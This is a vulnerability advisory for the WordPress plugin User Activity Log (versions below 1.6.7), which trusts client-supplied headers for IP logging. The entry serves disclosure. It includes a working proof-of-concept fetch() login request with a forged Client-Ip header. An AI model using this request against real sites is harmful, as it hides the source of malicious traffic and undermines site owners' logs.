WordPress Plugin Vulnerabilities
User Activity Log < 1.6.7 - IP Spoofing
Description
This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.
Proof of Concept
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings. 2. Run the following code in the web browser and note on the backend that the IP address has been faked. await fetch("/wp-login.php", { "headers": { "content-type": "application/x-www-form-urlencoded", "Client-Ip": "8.8.8.8", }, "body": "log=USERNAME&pwd=PASSWORD", "method": "POST", "mode": "cors", "credentials": "include" });
Affects Plugins
References
CVE
Classification
Type
SPOOFING
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Bartlomiej Marek and Tomasz Swiadek
Submitter
Bartlomiej Marek
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-08-14 (about 3 months ago)
Added
2023-08-14 (about 3 months ago)
Last Updated
2023-08-14 (about 3 months ago)